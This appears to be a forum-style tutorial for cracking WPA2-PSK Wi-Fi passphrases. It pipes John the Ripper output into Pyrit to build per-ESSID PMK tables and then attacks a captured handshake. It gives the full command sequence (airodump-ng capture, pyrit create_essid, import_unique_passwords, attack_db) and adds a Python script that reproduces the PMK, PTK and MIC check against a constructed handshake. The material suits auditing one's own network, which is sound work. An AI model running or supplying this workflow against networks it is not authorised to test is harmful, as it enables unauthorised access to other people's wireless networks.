Using JTR and Pyrit to crack WPA2-PSK keys
I have chosen a strong password to access my wireless AP with WPA2 security. I have used John the Ripper, Aircrack-ng, and Pyrit with no luck in finding the correct password with these tools.
What I usually did was capture the handshake and run JTR in incremental:all mode against it until the password was found. That was taking too long, so I started compiling hash tables with Pyrit. After 3 billion PMKs were created, I attempted to attack the AP, with no luck in finding the correct password.
The new method uses JTR to generate the candidate passphrases and Pyrit to build the hash tables (the PMKs) for them, then runs pyrit attack_db against the captured handshake to complete the crack.
Here's an example:
First use airodump-ng to capture your handshake:
airodump-ng -w file -c channel --bssid BSSID wlan0
Next create a database entry for the ESSID you want to build a hash table for:
pyrit -e ESSID create_essid
Then import the passwords from JTR by piping its output into Pyrit:
/Desktop/pentest$ sudo /pentest/passwords/john/john --stdout --incremental:all | pyrit -i - import_unique_passwords
After that finishes, create the tables and attack the capture with:
pyrit -r BSSID-01.cap attack_db
A few things to keep in mind. The PMK is PBKDF2-HMAC-SHA1 of the passphrase salted with the ESSID, so the tables are only good for that exact network name. Pyrit drops every candidate shorter than 8 or longer than 63 characters on import, because those are not valid WPA-PSK passphrases, so check the length limits of the incremental mode in john.conf; anything john emits below 8 characters is wasted work. Finally, attack_db only tests PMKs that are already computed: run pyrit batch (or use attack_batch, which computes and attacks in one pass) if the imported passwords have not been processed yet.
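As an added illustration, not part of the original post and not Pyrit's own code, the Python below models what that pipeline computes: the 8-63 character import filter, the per-ESSID PMK table (PBKDF2-HMAC-SHA1, 4096 rounds), and the attack_db step that derives the KCK from each PMK and checks it against the handshake MIC. The handshake here is constructed (made-up MACs, nonces and a minimal EAPOL-Key message 2 with its MIC field zeroed) and stands in for BSSID-01.cap; it assumes the WPA2/CCMP key descriptor version 2 MIC (HMAC-SHA1 truncated to 16 bytes). The only external check is the 802.11i Annex H test vector for "password"/"IEEE".

```python
"""Toy model of the Pyrit workflow: import candidates, build a PMK table
per ESSID, then test each PMK against a captured 4-way handshake."""
import hashlib
import hmac

PMK_LEN = 32
PTK_LEN = 64  # CCMP PTK = KCK(16) | KEK(16) | TK(32)


def pmk(passphrase: str, essid: str) -> bytes:
    """PMK = PBKDF2-HMAC-SHA1(passphrase, ESSID, 4096, 32). The ESSID is the
    salt, which is why tables are built per ESSID and not reusable."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), essid.encode(), 4096, PMK_LEN)


def import_unique_passwords(candidates):
    """Mimic pyrit's import filter: only 8..63 character, de-duplicated
    candidates survive, since nothing else is a valid WPA-PSK passphrase."""
    seen, out = set(), []
    for c in candidates:
        c = c.rstrip("\n")
        if 8 <= len(c) <= 63 and c not in seen:
            seen.add(c)
            out.append(c)
    return out


def batch(essid, passwords):
    """Like pyrit batch: precompute (passphrase -> PMK) for one ESSID."""
    return {p: pmk(p, essid) for p in passwords}


def prf512(key, label, data):
    """802.11i PRF-512: concat HMAC-SHA1(key, label||0x00||data||i), i=0..3."""
    out = b"".join(hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
                   for i in range(4))
    return out[:PTK_LEN]


def ptk(pmk_bytes, aa, spa, anonce, snonce):
    data = min(aa, spa) + max(aa, spa) + min(anonce, snonce) + max(anonce, snonce)
    return prf512(pmk_bytes, b"Pairwise key expansion", data)


def eapol_mic(kck, eapol_mic_zeroed):
    """WPA2 key descriptor version 2: MIC = HMAC-SHA1(KCK, frame)[:16]."""
    return hmac.new(kck, eapol_mic_zeroed, hashlib.sha1).digest()[:16]


def attack_db(table, hs):
    """Like pyrit attack_db: for each precomputed PMK derive the KCK and see
    whether it reproduces the MIC in the captured message 2."""
    for passphrase, pmk_bytes in table.items():
        kck = ptk(pmk_bytes, hs["ap_mac"], hs["sta_mac"], hs["anonce"], hs["snonce"])[:16]
        if hmac.compare_digest(eapol_mic(kck, hs["eapol"]), hs["mic"]):
            return passphrase
    return None


def make_handshake(essid, passphrase):
    """Constructed sample handshake (stand-in for BSSID-01.cap): fake MACs,
    fake nonces, and a minimal EAPOL-Key message 2 with the MIC field zeroed."""
    ap_mac = bytes.fromhex("00112233aabb")   # made-up BSSID
    sta_mac = bytes.fromhex("66778899ccdd")  # made-up station MAC
    anonce = bytes(range(32))
    snonce = bytes(range(32, 64))
    body = (b"\x02" + b"\x01\x0a" + b"\x00\x10" + b"\x00" * 8  # RSN, key info (MIC|pairwise|v2), key len, replay ctr
            + snonce + b"\x00" * 16 + b"\x00" * 8 + b"\x00" * 8  # nonce, IV, RSC, key ID
            + b"\x00" * 16 + b"\x00\x00")                      # MIC (zeroed), key data length
    eapol = b"\x01\x03" + len(body).to_bytes(2, "big") + body
    kck = ptk(pmk(passphrase, essid), ap_mac, sta_mac, anonce, snonce)[:16]
    return {"ap_mac": ap_mac, "sta_mac": sta_mac, "anonce": anonce,
            "snonce": snonce, "eapol": eapol, "mic": eapol_mic(kck, eapol)}


# Constructed candidate list, as if piped from john --stdout.
CANDIDATES = ["admin", "password1", "hunter2", "letmein1",
              "correct horse battery", "password1", "Tr0ub4dor&3"]

if __name__ == "__main__":
    hs = make_handshake("TestNet", "correct horse battery")
    table = batch("TestNet", import_unique_passwords(CANDIDATES))
    print("recovered:", attack_db(table, hs))
```

Running the attack with a table built for a different ESSID returns nothing even though the right passphrase is in it, which is the practical reason the create_essid step matters.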